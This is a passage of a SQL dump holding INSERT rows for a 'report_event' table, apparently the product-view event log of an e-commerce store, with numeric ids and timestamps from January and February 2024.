(9464, '2024-01-28 04:38:37', 1, 2058, 0, 1, 1),
(9465, '2024-01-28 04:38:41', 1, 2055, 0, 1, 1),
(9466, '2024-01-28 04:38:47', 1, 2061, 0, 1, 1),
(9467, '2024-01-28 04:38:51', 1, 2062, 0, 1, 1),
(9468, '2024-01-28 04:42:52', 1, 2054, 0, 1, 1),
(9469, '2024-01-28 04:43:47', 1, 2059, 0, 1, 1),
(9470, '2024-01-28 04:44:32', 1, 2064, 0, 1, 1),
(9471, '2024-01-28 04:58:05', 1, 2054, 0, 1, 1),
(9472, '2024-01-28 05:13:51', 1, 2064, 0, 1, 1),
(9473, '2024-01-28 05:16:16', 1, 2059, 0, 1, 1),
(9474, '2024-01-28 05:30:03', 1, 2064, 0, 1, 1),
(9475, '2024-01-28 07:06:15', 1, 2053, 0, 1, 1),
(9476, '2024-01-28 13:33:24', 1, 2054, 0, 1, 1),
(9477, '2024-01-28 13:40:38', 1, 2055, 0, 1, 1),
(9478, '2024-01-28 19:05:18', 1, 2064, 0, 1, 1),
(9479, '2024-01-28 20:29:31', 1, 2053, 0, 1, 1),
(9480, '2024-01-28 20:40:28', 1, 2059, 0, 1, 1),
(9481, '2024-01-29 02:44:03', 1, 2060, 0, 1, 1),
(9482, '2024-01-29 04:24:43', 1, 2064, 0, 1, 1),
(9483, '2024-01-29 04:51:18', 1, 2059, 0, 1, 1),
(9484, '2024-01-29 04:56:54', 1, 2059, 0, 1, 1),
(9485, '2024-01-29 05:08:23', 1, 2054, 0, 1, 1),
(9486, '2024-01-29 06:32:02', 1, 2053, 0, 1, 1),
(9487, '2024-01-29 09:09:18', 1, 2064, 0, 1, 1),
(9488, '2024-01-29 09:37:07', 1, 2061, 0, 1, 1),
(9489, '2024-01-29 11:27:28', 1, 2064, 0, 1, 1),
(9490, '2024-01-29 13:01:18', 1, 2055, 0, 1, 1),
(9491, '2024-01-29 14:06:11', 1, 2059, 0, 1, 1),
(9492, '2024-01-29 19:09:47', 1, 2064, 0, 1, 1),
(9493, '2024-01-29 19:48:54', 1, 2054, 0, 1, 1),
(9494, '2024-01-29 21:20:18', 1, 2053, 0, 1, 1),
(9495, '2024-01-29 21:54:08', 1, 2061, 0, 1, 1),
(9496, '2024-01-29 22:47:44', 1, 2061, 0, 1, 1),
(9497, '2024-01-30 01:04:55', 1, 2060, 0, 1, 1),
(9498, '2024-01-30 01:48:11', 1, 2061, 0, 1, 1),
(9499, '2024-01-30 03:05:41', 1, 2062, 0, 1, 1),
(9500, '2024-01-30 07:23:33', 1, 2059, 0, 1, 1),
(9501, '2024-01-30 07:36:31', 1, 2054, 0, 1, 1),
(9502, '2024-01-30 10:26:28', 1, 2055, 0, 1, 1),
(9503, '2024-01-30 11:52:36', 1, 2060, 0, 1, 1),
(9504, '2024-01-30 12:01:32', 1, 2064, 0, 1, 1),
(9505, '2024-01-30 12:39:20', 1, 2064, 0, 1, 1),
(9506, '2024-01-30 13:55:07', 1, 2055, 0, 1, 1),
(9507, '2024-01-30 13:57:18', 1, 2061, 0, 1, 1),
(9508, '2024-01-30 14:15:39', 1, 2061, 0, 1, 1),
(9509, '2024-01-30 17:09:52', 1, 2060, 0, 1, 1),
(9510, '2024-01-30 19:34:06', 1, 2060, 0, 1, 1),
(9511, '2024-01-30 20:30:07', 1, 2064, 0, 1, 1),
(9512, '2024-01-30 22:22:59', 1, 2059, 0, 1, 1),
(9513, '2024-01-30 23:00:26', 1, 2059, 0, 1, 1),
(9514, '2024-01-30 23:03:19', 1, 2054, 0, 1, 1),
(9515, '2024-01-30 23:14:58', 1, 2055, 0, 1, 1),
(9516, '2024-01-31 01:01:19', 1, 2061, 0, 1, 1),
(9517, '2024-01-31 03:34:31', 1, 2053, 0, 1, 1),
(9518, '2024-01-31 03:38:18', 1, 2060, 0, 1, 1),
(9519, '2024-01-31 04:06:34', 1, 2063, 0, 1, 1),
(9520, '2024-01-31 04:22:25', 1, 2059, 0, 1, 1),
(9521, '2024-01-31 07:01:48', 1, 2055, 0, 1, 1),
(9522, '2024-01-31 07:13:10', 1, 2059, 0, 1, 1),
(9523, '2024-01-31 07:16:40', 1, 2054, 0, 1, 1),
(9524, '2024-01-31 10:08:12', 1, 2060, 0, 1, 1);
INSERT INTO `report_event` (`event_id`, `logged_at`, `event_type_id`, `object_id`, `subject_id`, `subtype`, `store_id`) VALUES
(9525, '2024-01-31 10:26:30', 1, 2055, 0, 1, 1),
(9526, '2024-01-31 10:44:18', 1, 2060, 0, 1, 1),
(9527, '2024-01-31 10:44:20', 1, 2055, 0, 1, 1),
(9528, '2024-01-31 10:44:27', 1, 2059, 0, 1, 1),
(9529, '2024-01-31 10:44:31', 1, 2058, 0, 1, 1),
(9530, '2024-01-31 10:44:36', 1, 2054, 0, 1, 1),
(9531, '2024-01-31 10:44:39', 1, 2064, 0, 1, 1),
(9532, '2024-01-31 10:44:43', 1, 2063, 0, 1, 1),
(9533, '2024-01-31 10:44:48', 1, 2062, 0, 1, 1),
(9534, '2024-01-31 10:44:51', 1, 2061, 0, 1, 1),
(9535, '2024-01-31 10:59:21', 1, 2062, 0, 1, 1),
(9536, '2024-01-31 15:07:29', 1, 2054, 0, 1, 1),
(9537, '2024-01-31 17:33:59', 1, 2054, 0, 1, 1),
(9538, '2024-01-31 18:16:43', 1, 2054, 0, 1, 1),
(9539, '2024-01-31 18:43:57', 1, 2061, 0, 1, 1),
(9540, '2024-01-31 20:41:26', 1, 2064, 0, 1, 1),
(9541, '2024-02-01 03:54:25', 1, 2055, 0, 1, 1),
(9542, '2024-02-01 06:59:34', 1, 2063, 0, 1, 1),
(9543, '2024-02-01 07:43:40', 1, 2063, 0, 1, 1),
(9544, '2024-02-01 10:25:52', 1, 2060, 0, 1, 1),
(9545, '2024-02-01 11:13:51', 1, 2063, 0, 1, 1),
(9546, '2024-02-01 16:41:32', 1, 2058, 0, 1, 1),
(9547, '2024-02-01 18:09:16', 1, 2064, 0, 1, 1),
(9548, '2024-02-01 18:09:29', 1, 2064, 0, 1, 1),
(9549, '2024-02-01 18:10:44', 1, 2062, 0, 1, 1),
(9550, '2024-02-01 18:10:49', 1, 2062, 0, 1, 1),
(9551, '2024-02-01 18:11:20', 1, 2053, 0, 1, 1),
(9552, '2024-02-01 18:12:40', 1, 2063, 0, 1, 1),
(9553, '2024-02-01 18:12:52', 1, 2063, 0, 1, 1),
(9554, '2024-02-01 18:12:56', 1, 2061, 0, 1, 1),
(9555, '2024-02-01 18:13:00', 1, 2061, 0, 1, 1),
(9556, '2024-02-01 18:13:13', 1, 2059, 0, 1, 1),
(9557, '2024-02-01 18:13:17', 1, 2059, 0, 1, 1),
(9558, '2024-02-01 18:13:21', 1, 2058, 0, 1, 1),
(9559, '2024-02-01 18:14:15', 1, 2058, 0, 1, 1),
(9560, '2024-02-01 18:15:36', 1, 2055, 0, 1, 1),
(9561, '2024-02-01 18:15:45', 1, 2054, 0, 1, 1),
(9562, '2024-02-01 18:15:45', 1, 2055, 0, 1, 1),
(9563, '2024-02-01 18:15:48', 1, 2054, 0, 1, 1),
(9564, '2024-02-01 18:22:00', 1, 2060, 0, 1, 1),
(9565, '2024-02-01 18:22:04', 1, 2060, 0, 1, 1),
(9566, '2024-02-01 20:04:07', 1, 2061, 0, 1, 1),
(9567, '2024-02-01 21:06:14', 1, 2054, 0, 1, 1),
(9568, '2024-02-01 22:15:17', 1, 2059, 0, 1, 1),
(9569, '2024-02-01 22:15:17', 1, 2059, 0, 1, 1),
(9570, '2024-02-01 22:53:39', 1, 2064, 0, 1, 1),
(9571, '2024-02-01 23:27:34', 1, 2061, 0, 1, 1),
(9572, '2024-02-01 23:53:13', 1, 2054, 0, 1, 1),
(9573, '2024-02-02 01:26:18', 1, 2053, 0, 1, 1),
(9574, '2024-02-02 06:06:37', 1, 2061, 0, 1, 1),
(9575, '2024-02-02 08:44:49', 4, 2061, 1871, 1, 1),
(9576, '2024-02-02 10:42:12', 1, 2054, 0, 1, 1),
(9577, '2024-02-02 11:55:50', 1, 2060, 0, 1, 1),
(9578, '2024-02-02 11:55:52', 1, 2063, 0, 1, 1),
(9579, '2024-02-02 11:55:54', 1, 2058, 0, 1, 1),
(9580, '2024-02-02 11:55:58', 1, 2055, 0, 1, 1),
(9581, '2024-02-02 11:56:05', 1, 2061, 0, 1, 1),
(9582, '2024-02-02 11:56:08', 1, 2062, 0, 1, 1),
(9583, '2024-02-02 11:57:57', 1, 2054, 0, 1, 1),
(9584, '2024-02-02 11:58:45', 1, 2059, 0, 1, 1),
(9585, '2024-02-02 11:59:25', 1, 2064, 0, 1, 1),
(9586, '2024-02-02 16:03:16', 1, 2062, 0, 1, 1),
(9587, '2024-02-02 17:53:03', 1, 2061, 0, 1, 1),
(9588, '2024-02-02 18:30:49', 1, 2054, 0, 1, 1),
(9589, '2024-02-02 19:39:43', 1, 2053, 0, 1, 1),
(9590, '2024-02-03 01:35:05', 1, 2059, 0, 1, 1),
(9591, '2024-02-03 02:01:26', 1, 2062, 0, 1, 1),
(9592, '2024-02-03 05:23:38', 1, 2054, 0, 1, 1),
(9593, '2024-02-03 05:47:52', 1, 2060, 0, 1, 1),
(9594, '2024-02-03 05:47:56', 4, 2060, 1879, 1, 1),
(9595, '2024-02-03 10:47:51', 1, 2061, 0, 1, 1),
(9596, '2024-02-03 11:15:20', 1, 2064, 0, 1, 1),
(9597, '2024-02-03 11:17:13', 1, 2053, 0, 1, 1),
(9598, '2024-02-03 12:36:19', 1, 2059, 0, 1, 1),
(9599, '2024-02-03 13:03:11', 1, 2054, 0, 1, 1),
(9600, '2024-02-03 13:15:08', 1, 2060, 0, 1, 1),
(9601, '2024-02-03 13:15:09', 4, 2060, 1884, 1, 1),
(9602, '2024-02-03 16:44:57', 1, 2064, 0, 1, 1),
(9603, '2024-02-03 16:56:23', 1, 2061, 0, 1, 1),
(9604, '2024-02-03 17:27:31', 1, 2059, 0, 1, 1),
(9605, '2024-02-03 17:45:46', 1, 2058, 0, 1, 1),
(9606, '2024-02-03 19:01:28', 1, 2053, 0, 1, 1),
(9607, '2024-02-03 19:01:30', 1, 2064, 0, 1, 1),
(9608, '2024-02-04 02:24:07', 1, 2059, 0, 1, 1),
(9609, '2024-02-04 04:16:11', 1, 2061, 0, 1, 1),
(9610, '2024-02-04 04:19:30', 1, 2060, 0, 1, 1),
(9611, '2024-02-04 05:47:20', 1, 2064, 0, 1, 1),
(9612, '2024-02-04 06:32:13', 1, 2053, 0, 1, 1),
(9613, '2024-02-04 06:55:12', 1, 2055, 0, 1, 1),
(9614, '2024-02-04 07:01:49', 1, 2054, 0, 1, 1),
(9615, '2024-02-04 07:02:18', 1, 2054, 0, 1, 1),
(9616, '2024-02-04 07:02:32', 1, 2059, 0, 1, 1),
(9617, '2024-02-04 07:02:41', 1, 2061, 0, 1, 1),
(9618, '2024-02-04 07:02:52', 1, 2058, 0, 1, 1),
(9619, '2024-02-04 14:08:57', 1, 2055, 0, 1, 1),
(9620, '2024-02-04 14:09:09', 1, 2053, 0, 1, 1),
(9621, '2024-02-04 14:09:13', 1, 2060, 0, 1, 1),
(9622, '2024-02-04 14:09:15', 1, 2062, 0, 1, 1),
(9623, '2024-02-04 14:09:18', 1, 2063, 0, 1, 1),
(9624, '2024-02-04 14:09:22', 1, 2054, 0, 1, 1),
(9625, '2024-02-04 14:09:22', 1, 2058, 0, 1, 1),
(9626, '2024-02-04 14:09:25', 1, 2064, 0, 1, 1),
(9627, '2024-02-04 14:09:32', 1, 2059, 0, 1, 1),
(9628, '2024-02-04 16:55:57', 1, 2064, 0, 1, 1),
(9629, '2024-02-04 17:01:54', 1, 2055, 0, 1, 1),
(9630, '2024-02-04 18:38:23', 1, 2064, 0, 1, 1),
(9631, '2024-02-04 19:07:47', 1, 2053, 0, 1, 1),
(9632, '2024-02-04 21:29:04', 1, 2059, 0, 1, 1),
(9633, '2024-02-04 22:21:12', 1, 2054, 0, 1, 1),
(9634, '2024-02-04 22:21:12', 1, 2055, 0, 1, 1),
(9635, '2024-02-04 22:21:12', 1, 2064, 0, 1, 1),
(9636, '2024-02-05 02:17:45', 1, 2058, 0, 1, 1),
(9637, '2024-02-05 04:21:23', 1, 2059, 0, 1, 1),
(9638, '2024-02-05 04:35:45', 1, 2061, 0, 1, 1),
(9639, '2024-02-05 05:21:15', 1, 2059, 0, 1, 1),
(9640, '2024-02-05 06:50:58', 1, 2053, 0, 1, 1),
(9641, '2024-02-05 08:40:20', 1, 2055, 0, 1, 1),
(9642, '2024-02-05 10:33:02', 1, 2060, 0, 1, 1),
(9643, '2024-02-05 10:46:15', 1, 2053, 0, 1, 1),
(9644, '2024-02-05 13:03:09', 1, 2059, 0, 1, 1),
(9645, '2024-02-05 14:29:10', 1, 2062, 0, 1, 1),
(9646, '2024-02-05 14:31:00', 1, 2062, 0, 1, 1),
(9647, '2024-02-05 17:36:16', 1, 2055, 0, 1, 1),
(9648, '2024-02-05 17:46:51', 1, 2053, 0, 1, 1),
(9649, '2024-02-05 18:02:18', 1, 2060, 0, 1, 1),
(9650, '2024-02-05 18:21:31', 1, 2063, 0, 1, 1),
(9651, '2024-02-05 19:09:39', 1, 2058, 0, 1, 1),
(9652, '2024-02-05 20:43:45', 1, 2055, 0, 1, 1),
(9653, '2024-02-05 23:05:14', 1, 2053, 0, 1, 1),
(9654, '2024-02-05 23:24:27', 1, 2061, 0, 1, 1),
(9655, '2024-02-06 00:38:01', 1, 2062, 0, 1, 1),
(9656, '2024-02-06 00:49:45', 1, 2062, 0, 1, 1),
(9657, '2024-02-06 03:30:20', 1, 2054, 0, 1, 1),
(9658, '2024-02-06 04:03:22', 1, 2061, 0, 1, 1),
(9659, '2024-02-06 04:07:39', 1, 2059, 0, 1, 1),
(9660, '2024-02-06 04:39:44', 1, 2064, 0, 1, 1),
(9661, '2024-02-06 05:10:52', 1, 2055, 0, 1, 1),
(9662, '2024-02-06 05:11:09', 1, 2064, 0, 1, 1),
(9663, '2024-02-06 05:11:24', 1, 2061, 0, 1, 1),
(9664, '2024-02-06 05:11:45', 1, 2058, 0, 1, 1),
(9665, '2024-02-06 05:57:57', 1, 2059, 0, 1, 1),
(9666, '2024-02-06 07:13:56', 1, 2054, 0, 1, 1),
(9667, '2024-02-06 08:03:15', 1, 2053, 0, 1, 1),
(9668, '2024-02-06 10:13:26', 1, 2054, 0, 1, 1),
(9669, '2024-02-06 19:43:21', 1, 2053, 0, 1, 1),
(9670, '2024-02-06 19:59:51', 1, 2061, 0, 1, 1),
(9671, '2024-02-06 20:00:05', 1, 2061, 0, 1, 1),
(9672, '2024-02-07 02:03:56', 1, 2064, 0, 1, 1),
(9673, '2024-02-07 02:34:27', 1, 2054, 0, 1, 1),
(9674, '2024-02-07 08:38:45', 1, 2064, 0, 1, 1),
(9675, '2024-02-07 08:38:52', 1, 2064, 0, 1, 1),
(9676, '2024-02-07 08:56:52', 1, 2059, 0, 1, 1),
(9677, '2024-02-07 10:38:59', 1, 2060, 0, 1, 1),
(9678, '2024-02-07 11:11:55', 1, 2053, 0, 1, 1),
(9679, '2024-02-07 14:14:58', 1, 2054, 0, 1, 1),
(9680, '2024-02-07 16:39:04', 1, 2064, 0, 1, 1),
(9681, '2024-02-07 19:32:57', 1, 2053, 0, 1, 1),
(9682, '2024-02-07 22:36:48', 1, 2058, 0, 1, 1),
(9683, '2024-02-08 00:47:17', 1, 2054, 0, 1, 1),
(9684, '2024-02-08 04:36:06', 1, 2053, 0, 1, 1),
(9685, '2024-02-08 06:43:48', 1, 2059, 0, 1, 1),
(9686, '2024-02-08 08:28:03', 1, 2064, 0, 1, 1),
(9687, '2024-02-08 09:10:03', 1, 2054, 0, 1, 1),
(9688, '2024-02-08 14:17:39', 1, 2064, 0, 1, 1),
(9689, '2024-02-08 17:06:29', 1, 2054, 0, 1, 1),
(9690, '2024-02-08 17:43:56', 1, 2064, 0, 1, 1),
(9691, '2024-02-08 19:13:34', 1, 2060, 0, 1, 1),
(9692, '2024-02-08 19:27:35', 1, 2053, 0, 1, 1),
(9693, '2024-02-08 22:45:12', 1, 2063, 0, 1, 1),
(9694, '2024-02-09 03:26:13', 1, 2061, 0, 1, 1),
(9695, '2024-02-09 06:28:26', 1, 2054, 0, 1, 1),
(9696, '2024-02-09 06:59:05', 1, 2064, 0, 1, 1),
(9697, '2024-02-09 10:48:11', 1, 2053, 0, 1, 1),
(9698, '2024-02-09 15:10:55', 1, 2063, 0, 1, 1),
(9699, '2024-02-09 15:51:53', 1, 2064, 0, 1, 1),
(9700, '2024-02-09 18:38:03', 1, 2053, 0, 1, 1),
(9701, '2024-02-09 19:27:45', 1, 2054, 0, 1, 1),
(9702, '2024-02-10 05:36:05', 1, 2053, 0, 1, 1),
(9703, '2024-02-10 06:23:24', 1, 2054, 0, 1, 1),
(9704, '2024-02-10 13:08:06', 1, 2060, 0, 1, 1),
(9705, '2024-02-10 13:08:08', 1, 2053, 0, 1, 1),
(9706, '2024-02-10 13:20:42', 1, 2060, 0, 1, 1),
(9707, '2024-02-10 13:31:47', 1, 2063, 0, 1, 1),
(9708, '2024-02-10 14:10:31', 1, 2059, 0, 1, 1),
(9709, '2024-02-10 14:57:59', 1, 2054, 0, 1, 1),
(9710, '2024-02-10 16:45:55', 1, 2059, 0, 1, 1),
(9711, '2024-02-10 20:21:22', 1, 2064, 0, 1, 1),
(9712, '2024-02-11 01:38:35', 1, 2053, 0, 1, 1),
(9713, '2024-02-11 02:26:53', 1, 2059, 0, 1, 1),
(9714, '2024-02-11 03:34:16', 1, 2054, 0, 1, 1),
(9715, '2024-02-11 06:37:39', 1, 2064, 0, 1, 1),
(9716, '2024-02-11 10:25:53', 1, 2062, 0, 1, 1),
(9717, '2024-02-11 13:14:30', 1, 2053, 0, 1, 1),
(9718, '2024-02-11 17:59:20', 1, 2064, 0, 1, 1),
(9719, '2024-02-11 19:14:18', 1, 2054, 0, 1, 1),
(9720, '2024-02-11 22:14:40', 1, 2064, 0, 1, 1),
(9721, '2024-02-12 02:09:14', 1, 2064, 0, 1, 1),
(9722, '2024-02-12 03:10:48', 1, 2054, 0, 1, 1),
(9723, '2024-02-12 03:18:54', 1, 2059, 0, 1, 1),
(9724, '2024-02-12 04:30:23', 1, 2064, 0, 1, 1),
(9725, '2024-02-12 05:47:46', 1, 2060, 0, 1, 1),
(9726, '2024-02-12 06:10:09', 1, 2059, 0, 1, 1),
(9727, '2024-02-12 06:10:11', 1, 2059, 0, 1, 1),
(9728, '2024-02-12 06:39:19', 1, 2060, 0, 1, 1),
(9729, '2024-02-12 07:09:45', 1, 2060, 0, 1, 1),
(9730, '2024-02-12 07:30:49', 1, 2053, 0, 1, 1),
(9731, '2024-02-12 07:50:07', 1, 2058, 0, 1, 1),
(9732, '2024-02-12 09:17:01', 1, 2063, 0, 1, 1),
(9733, '2024-02-12 09:17:17', 1, 2063, 0, 1, 1),
(9734, '2024-02-12 11:29:28', 1, 2058, 0, 1, 1),
(9735, '2024-02-12 15:09:05', 1, 2053, 0, 1, 1),
(9736, '2024-02-12 18:28:39', 1, 2064, 0, 1, 1),
(9737, '2024-02-12 19:36:16', 1, 2054, 0, 1, 1),
(9738, '2024-02-12 20:10:49', 1, 2064, 0, 1, 1),
(9739, '2024-02-13 08:10:51', 1, 2053, 0, 1, 1),
(9740, '2024-02-13 08:39:01', 1, 2064, 0, 1, 1),
(9741, '2024-02-13 09:21:21', 1, 2054, 0, 1, 1),
(9742, '2024-02-13 09:39:12', 1, 2062, 0, 1, 1),
(9743, '2024-02-13 09:55:28', 1, 2054, 0, 1, 1),
(9744, '2024-02-13 13:22:55', 1, 2058, 0, 1, 1),
(9745, '2024-02-13 14:35:56', 1, 2060, 0, 1, 1),
(9746, '2024-02-13 14:45:50', 1, 2063, 0, 1, 1),
(9747, '2024-02-13 15:08:17', 1, 2058, 0, 1, 1),
(9748, '2024-02-13 15:50:27', 1, 2055, 0, 1, 1),
(9749, '2024-02-13 17:05:06', 1, 2061, 0, 1, 1),
(9750, '2024-02-13 17:42:43', 1, 2062, 0, 1, 1),
(9751, '2024-02-13 18:53:47', 1, 2054, 0, 1, 1),
(9752, '2024-02-13 19:08:56', 1, 2059, 0, 1, 1),
(9753, '2024-02-13 19:21:14', 1, 2064, 0, 1, 1),
(9754, '2024-02-13 21:43:05', 1, 2060, 0, 1, 1),
(9755, '2024-02-13 21:53:53', 1, 2063, 0, 1, 1),
(9756, '2024-02-13 22:17:31', 1, 2058, 0, 1, 1),
(9757, '2024-02-13 23:04:15', 1, 2055, 0, 1, 1),
(9758, '2024-02-13 23:46:54', 1, 2064, 0, 1, 1),
(9759, '2024-02-14 00:09:28', 1, 2054, 0, 1, 1),
(9760, '2024-02-14 00:53:52', 1, 2060, 0, 1, 1),
(9761, '2024-02-14 01:03:29', 1, 2063, 0, 1, 1),
(9762, '2024-02-14 01:26:12', 1, 2058, 0, 1, 1),
(9763, '2024-02-14 02:15:10', 1, 2055, 0, 1, 1),
(9764, '2024-02-14 03:38:49', 1, 2061, 0, 1, 1),
(9765, '2024-02-14 04:20:58', 1, 2062, 0, 1, 1),
(9766, '2024-02-14 05:09:26', 1, 2060, 0, 1, 1),
(9767, '2024-02-14 05:43:54', 1, 2054, 0, 1, 1),
(9768, '2024-02-14 06:01:23', 1, 2059, 0, 1, 1),
(9769, '2024-02-14 06:15:31', 1, 2064, 0, 1, 1),
(9770, '2024-02-14 06:57:06', 1, 2055, 0, 1, 1),
(9771, '2024-02-14 08:24:09', 1, 2058, 0, 1, 1),
(9772, '2024-02-14 08:24:27', 1, 2061, 1968, 1, 1),
(9773, '2024-02-14 08:24:47', 1, 2059, 1968, 1, 1),
(9774, '2024-02-14 08:24:52', 1, 2053, 0, 1, 1),
(9775, '2024-02-14 08:25:16', 1, 2060, 1968, 1, 1),
(9776, '2024-02-14 08:25:25', 1, 2062, 1968, 1, 1),
(9777, '2024-02-14 08:26:03', 1, 2063, 1968, 1, 1),
(9778, '2024-02-14 08:26:13', 1, 2064, 1968, 1, 1),
(9779, '2024-02-14 08:26:33', 1, 2055, 1968, 1, 1),
(9780, '2024-02-14 08:26:54', 1, 2054, 1968, 1, 1),
(9781, '2024-02-14 08:43:38', 1, 2061, 0, 1, 1),
(9782, '2024-02-14 08:43:39', 1, 2061, 0, 1, 1),
(9783, '2024-02-14 08:58:51', 1, 2064, 0, 1, 1),
(9784, '2024-02-14 09:10:28', 1, 2061, 0, 1, 1),
(9785, '2024-02-14 11:21:19', 1, 2053, 0, 1, 1),
(9786, '2024-02-14 12:04:10', 1, 2054, 0, 1, 1),
(9787, '2024-02-14 12:44:32', 1, 2054, 0, 1, 1),
(9788, '2024-02-14 16:19:09', 1, 2062, 0, 1, 1),
(9789, '2024-02-14 18:31:39', 1, 2064, 0, 1, 1),
(9790, '2024-02-14 19:42:09', 1, 2053, 0, 1, 1),
(9791, '2024-02-14 19:44:02', 1, 2054, 0, 1, 1),
(9792, '2024-02-14 22:12:12', 1, 2054, 0, 1, 1),
(9793, '2024-02-15 02:16:26', 1, 2061, 0, 1, 1),
(9794, '2024-02-15 03:13:16', 1, 2064, 0, 1, 1),
(9795, '2024-02-15 03:42:31', 1, 2058, 0, 1, 1),
(9796, '2024-02-15 05:58:10', 1, 2053, 0, 1, 1),
(9797, '2024-02-15 06:50:15', 1, 2063, 0, 1, 1),
(9798, '2024-02-15 09:14:46', 1, 2054, 0, 1, 1),
(9799, '2024-02-15 13:14:04', 1, 2064, 0, 1, 1),
(9800, '2024-02-15 13:41:31', 1, 2053, 0, 1, 1),
(9801, '2024-02-15 16:12:14', 1, 2064, 0, 1, 1),
(9802, '2024-02-15 17:53:14', 1, 2054, 0, 1, 1),
(9803, '2024-02-15 19:11:06', 1, 2059, 0, 1, 1),
(9804, '2024-02-16 05:26:37', 1, 2058, 0, 1, 1),
(9805, '2024-02-16 05:27:48', 1, 2061, 0, 1, 1),
(9806, '2024-02-16 05:28:00', 1, 2059, 0, 1, 1),
(9807, '2024-02-16 05:28:10', 1, 2060, 0, 1, 1),
(9808, '2024-02-16 05:28:18', 1, 2062, 0, 1, 1),
(9809, '2024-02-16 05:28:27', 1, 2063, 0, 1, 1),
(9810, '2024-02-16 05:28:33', 1, 2064, 0, 1, 1),
(9811, '2024-02-16 05:29:14', 1, 2055, 0, 1, 1),
(9812, '2024-02-16 05:29:18', 1, 2054, 0, 1, 1),
(9813, '2024-02-16 05:29:22', 1, 2053, 0, 1, 1),
(9814, '2024-02-16 06:23:50', 1, 2058, 0, 1, 1),
(9815, '2024-02-16 06:23:54', 1, 2061, 0, 1, 1),
(9816, '2024-02-16 06:23:58', 1, 2059, 0, 1, 1),
(9817, '2024-02-16 06:24:02', 1, 2060, 0, 1, 1),
(9818, '2024-02-16 06:24:06', 1, 2062, 0, 1, 1),
(9819, '2024-02-16 06:24:10', 1, 2063, 0, 1, 1),
(9820, '2024-02-16 06:24:13', 1, 2064, 0, 1, 1),
(9821, '2024-02-16 06:25:43', 1, 2055, 0, 1, 1),
(9822, '2024-02-16 06:26:00', 1, 2054, 0, 1, 1),
(9823, '2024-02-16 06:26:13', 1, 2053, 0, 1, 1),
(9824, '2024-02-16 06:28:32', 1, 2064, 0, 1, 1),
(9825, '2024-02-16 09:53:12', 1, 2053, 0, 1, 1),
(9826, '2024-02-16 11:33:28', 1, 2054, 0, 1, 1),
(9827, '2024-02-16 13:20:32', 1, 2061, 0, 1, 1),
(9828, '2024-02-16 15:41:28', 1, 2064, 0, 1, 1),
(9829, '2024-02-16 18:54:50', 1, 2053, 0, 1, 1),
(9830, '2024-02-16 19:10:43', 1, 2054, 0, 1, 1),
(9831, '2024-02-16 19:21:29', 1, 2063, 0, 1, 1),
(9832, '2024-02-17 01:41:22', 1, 2064, 0, 1, 1),
(9833, '2024-02-17 03:16:01', 1, 2054, 0, 1, 1),
(9834, '2024-02-17 09:35:31', 1, 2053, 0, 1, 1),
(9835, '2024-02-17 13:17:49', 1, 2064, 0, 1, 1),
(9836, '2024-02-17 15:32:26', 1, 2054, 0, 1, 1),
(9837, '2024-02-17 17:13:24', 1, 2053, 0, 1, 1),
(9838, '2024-02-18 01:58:02', 1, 2064, 0, 1, 1),
(9839, '2024-02-18 07:12:54', 1, 2054, 0, 1, 1),
(9840, '2024-02-18 08:23:35', 1, 2061, 0, 1, 1),
(9841, '2024-02-18 11:24:53', 1, 2059, 0, 1, 1),
(9842, '2024-02-18 11:24:54', 1, 2059, 0, 1, 1),
(9843, '2024-02-18 11:24:55', 1, 2059, 0, 1, 1),
(9844, '2024-02-18 12:34:20', 1, 2053, 0, 1, 1),
(9845, '2024-02-18 15:43:31', 1, 2055, 0, 1, 1),
(9846, '2024-02-18 18:11:39', 1, 2061, 0, 1, 1),
(9847, '2024-02-18 18:12:14', 1, 2061, 0, 1, 1),
(9848, '2024-02-18 20:50:34', 1, 2053, 0, 1, 1),
(9849, '2024-02-18 21:00:32', 1, 2054, 0, 1, 1),
(9850, '2024-02-18 22:09:28', 1, 2064, 0, 1, 1),
(9851, '2024-02-18 23:33:54', 1, 2062, 0, 1, 1),
(9852, '2024-02-19 05:43:44', 1, 2064, 0, 1, 1),
(9853, '2024-02-19 07:06:16', 1, 2053, 0, 1, 1),
(9854, '2024-02-19 07:29:22', 1, 2054, 0, 1, 1),
(9855, '2024-02-19 14:59:02', 1, 2053, 0, 1, 1),
(9856, '2024-02-19 16:17:36', 1, 2064, 0, 1, 1),
(9857, '2024-02-19 19:12:24', 1, 2054, 0, 1, 1),
(9858, '2024-02-19 19:26:14', 1, 2064, 0, 1, 1),
(9859, '2024-02-19 22:42:03', 1, 2063, 0, 1, 1),
(9860, '2024-02-19 23:06:30', 1, 2064, 0, 1, 1),
(9861, '2024-02-20 01:14:13', 1, 2053, 0, 1, 1),
(9862, '2024-02-20 02:04:47', 1, 2058, 0, 1, 1),
(9863, '2024-02-20 02:05:00', 1, 2064, 0, 1, 1),
(9864, '2024-02-20 02:05:12', 1, 2054, 0, 1, 1),
(9865, '2024-02-20 02:05:14', 1, 2062, 0, 1, 1),
(9866, '2024-02-20 02:05:16', 1, 2055, 0, 1, 1),
(9867, '2024-02-20 02:05:25', 1, 2059, 0, 1, 1),
(9868, '2024-02-20 02:05:28', 1, 2063, 0, 1, 1),
(9869, '2024-02-20 02:05:31', 1, 2061, 0, 1, 1),
(9870, '2024-02-20 02:05:36', 1, 2060, 0, 1, 1),
(9871, '2024-02-20 02:06:00', 1, 2058, 0, 1, 1),
(9872, '2024-02-20 02:06:08', 1, 2064, 0, 1, 1),
(9873, '2024-02-20 02:06:21', 1, 2062, 0, 1, 1),
(9874, '2024-02-20 02:06:23', 1, 2055, 0, 1, 1),
(9875, '2024-02-20 02:06:30', 1, 2059, 0, 1, 1),
(9876, '2024-02-20 02:06:33', 1, 2063, 0, 1, 1),
(9877, '2024-02-20 02:06:36', 1, 2054, 0, 1, 1),
(9878, '2024-02-20 02:06:39', 1, 2061, 0, 1, 1),
(9879, '2024-02-20 02:06:45', 1, 2060, 0, 1, 1),
(9880, '2024-02-20 02:06:58', 1, 2053, 0, 1, 1),
(9881, '2024-02-20 07:06:24', 1, 2064, 0, 1, 1),
(9882, '2024-02-20 08:35:20', 1, 2061, 0, 1, 1),
(9883, '2024-02-20 08:35:23', 1, 2061, 0, 1, 1),
(9884, '2024-02-20 13:14:21', 1, 2053, 0, 1, 1),
(9885, '2024-02-20 15:29:09', 1, 2059, 0, 1, 1),
(9886, '2024-02-20 15:43:38', 1, 2054, 0, 1, 1),
(9887, '2024-02-20 21:48:21', 1, 2058, 0, 1, 1),
(9888, '2024-02-21 01:22:25', 1, 2053, 0, 1, 1),
(9889, '2024-02-21 01:58:51', 1, 2064, 0, 1, 1),
